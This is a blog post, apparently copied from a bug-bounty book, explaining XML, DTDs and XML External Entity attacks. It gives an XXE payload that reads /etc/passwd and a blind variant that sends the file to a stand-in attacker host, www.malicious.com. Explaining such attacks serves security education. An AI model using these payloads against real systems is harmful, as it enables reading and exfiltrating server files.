Tuesday, July 23, 2019

Hack Website Using XML External Entity Vulnerability

An XML External Entity (XXE) vulnerability involves exploiting how an application parses
XML input, more specifically, exploiting how the application processes the inclusion of
external entities included in the input. To gain a full appreciation for how this is exploited
and its potential, I think it’s best for us to first understand what the eXtensible Markup
Language (XML) and external entities are.

A metalanguage is a language used for describing other languages, and that’s what XML
is. It was developed after HTML in part, as a response to the shortcomings of HTML,
which is used to define the display of data, focusing on how it should look. In contrast,
XML is used to define how data is to be structured.

For example, in HTML, you have tags like <title> , <h1> , <table> , <p> , etc. all of which are
used to define how content is to be displayed. The <title> tag is used to define a page’s
title (shocking), <h1> tags refer define headings, <table> tags present data in rows and
columns and <p> are presented as simple text. In contrast, XML has no predefined tags.
Instead, the person creating the XML document defines their own tags to describe the
content being presented. Here’s an example:


<?xml version="1.0" encoding="UTF-8"?>
<jobs>
<job>
<title>Hacker</title>
<compensation>1000000</compensation>
<responsibility optional="1">Shot the web</responsibility>
</job>
</jobs>


Reading this, you can probably guess the purpose of the XML document - to present a
job listing but you have no idea how this will look if it were presented on a web page. The
first line of the XML is a declaration header indicating the version of XML to be used and
type of encoding. At the time of writing this, there are two versions of XML, 1.0 and 1.1.
Detailing the differences between 1.0 and 1.1 is beyond the scope of this book as they
should have no impact on your hacking.

After the initial header, the tag <jobs> is included and surrounds all other <job> tags,
which includes <title> , <compensation> and <responsibilities> tags. Now, whereas with HTML,XML External Entity Vulnerability

some tags don’t require closing tags (e.g., <br> ), all XML tags require a closing tag.
Again, drawing on the example above, <jobs> is a starting tag and </jobs> would be the
corresponding ending tag. In addition, each tag has a name and can have an attribute.
Using the tag <job> , the tag name is job but it has no attributes. <responsibility> on the other
hand has the name responsibility with an attribute optional made up of the attribute
name optional and attribute value 1.

Since anyone can define any tag, the obvious question then becomes, how does anyone
know how to parse and use an XML document if the tags can be anything? Well, a valid
XML document is valid because it follows the general rules of XML (no need for me to
list them all but having a closing tag is one example I mentioned above) and it matches
its document type definition (DTD). The DTD is the whole reason we’re diving into this
because it’s one of the things which will enable our exploit as hackers.

An XML DTD is like a definition document for the tags being used and is developed by
the XML designer, or author. With the example above, I would be the designer since I
defined the jobs document in XML. A DTD will define which tags exist, what attributes
they may have and what elements may be found in other elements, etc. While you and
I can create our own DTDs, some have been formalized and are widely used including
Really Simple Syndication (RSS), general data resources (RDF), health care information
(HL7 SGML/XML), etc.

Here’s what a DTD file would look like for my XML above:


<!ELEMENT Jobs (Job)*>
<!ELEMENT Job (Title, Compensation, Responsiblity)>
<!ELEMENT Title (#PCDATA)>
<!ELEMENT Compenstaion (#PCDATA)>
<!ELEMENT Responsibility(#PCDATA)>
<!ATTLIST Responsibility optional CDATA "0">

Looking at this, you can probably guess what most of it means. Our <jobs> tag is
actually an XML !ELEMENT and can contain the element Job. A Job is an !ELEMENT which
can contain a Title, Compensation and Responsibility, all of which are also !ELEMENTs
and can only contain character data, denoted by the (#PCDATA) . Lastly, the !ELEMENT
Responsibility has a possible attribute (!ATTLIST) optional whose default value is 0.

Not too difficult right? In addition to DTDs, there are still two important tags we haven’t
discused, the !DOCTYPE and !ENTITY tags. Up until this point, I’ve insinuated that DTD
files are external to our XML. Remember the first example above, the XML document
didn’t include the tag definitions, that was done by our DTD in the second example.

However, it’s possible to include the DTD within the XML document itself and to do so,
the first line of the XML must be a <!DOCTYPE> element. Combining our two examples
above, we’d get a document that looks like:XML External Entity Vulnerability

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE Jobs [
<!ELEMENT Job (Title, Compensation, Responsiblity)>
<!ELEMENT Title (#PCDATA)>
<!ELEMENT Compenstaion (#PCDATA)>
<!ELEMENT Responsibility(#PCDATA)>
<!ATTLIST Responsibility optional CDATA "0">
]>
<jobs>
<job>
<title>Hacker</title>
<compensation>1000000</compensation>
<responsibility optional="1">Shot the web</responsibility>
</job>
</jobs>

Here, we have what’s referred as an Internal DTD Declaration. Notice that we still begin
with a declaration header indicating our document conforms to XML 1.0 with UTF-8
encoding, but immediately after, we define our DOCTYPE for the XML to follow. Using
an external DTD would be similar except the !DOCTYPE would look like <!DOCTYPE jobs
SYSTEM "jobs.dtd"> . The XML parser would then parse the contents of the jobs.dtd file
when parsing the XML file. This is important because the !ENTITY tag is treated similarly
and provides the crux for our exploit.

An XML entity is like a placeholder for information. Using our previous example again,
if we wanted every job to include a link to our website, it would be tedious for us to
write the address every time, especially if our URL could change. Instead, we can use an
!ENTITY and get the parser to fetch the contents at the time of parsing and insert the
value into the document. I hope you see where I’m going with this.

Similar to an external DTD file, we can update our XML file to include this idea:


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE Jobs [
<!ELEMENT Job (Title, Compensation, Responsiblity, Website)>
<!ELEMENT Title (#PCDATA)>
<!ELEMENT Compenstaion (#PCDATA)>
<!ELEMENT Responsibility(#PCDATA)>
<!ATTLIST Responsibility optional CDATA "0">
<!ELEMENT Website ANY>
<!ENTITY url SYSTEM "website.txt">
]>
<jobs>XML External Entity Vulnerability
78
<job>
<title>Hacker</title>
<compensation>1000000</compensation>
<responsibility optional="1">Shot the web</responsibility>
<website>&url;</website>
</job>
</jobs>

Here, you’ll notice I’ve gone ahead and added a Website !ELEMENT but instead of
(#PCDATA), I’ve added ANY. This means the Website tag can contain any combination
of parsable data. I’ve also defined an !ENTITY with a SYSTEM attribute telling the parser
to get the contents of the website.txt file. Things should be getting clearer now.

Putting this all together, what do you think would happen if instead of “website.txt”, I
included “/etc/passwd”? As you probably guessed, our XML would be parsed and the
contents of the sensitive server file /etc/passwd would be included in our content. But
we’re the authors of the XML, so why would we do that?


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]
>
<foo>&xxe;</foo>

As you now know, my parser would receive this and recognize an internal DTD defining
a foo Document Type telling it foo can include any parsable data and that there’s an
!ENTITY xxe which should read my /etc/passwd file (the use of file:// is used to denote a
full file uri path to the /etc/passwd file) when the document is parsed and replace &xxe;
elements with those file contents. Then, you finish it off with the valid XML defining a
<foo> tag, which prints my server info. And that friends, is why XXE is so dangerous.
But wait, there’s more. What if the application didn’t print out a response, it only parsed
your content. Using the example above, the contents would be parsed but never returnedXML External Entity Vulnerability

to us. Well, what if instead of including a local file, you decided you wanted to contact a
malicious server like so:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "file:///etc/passwd" >
<!ENTITY callhome SYSTEM "www.malicious.com/?%xxe;">
]
>
<foo>&callhome;</foo>

Before explaining this, you may have picked up on the use of the % instead of the &
in the callhome URL, %xxe;. This is because the % is used when the entity is to be
evaluated within the DTD definition itself and the & when the entity is evaluated in
the XML document. Now, when the XML document is parsed, the callhome !ENTITY will
read the contents of the /etc/passwd file and make a remote call to www.malicous.com
sending the file contents as a URL parameter. Since we control that server, we can check
our logs and sure enough, have the contents of /etc/passwd. Game over for the web
application.
So, how do sites protect them against XXE vulnerabilities? They disable the parsing of
external entities.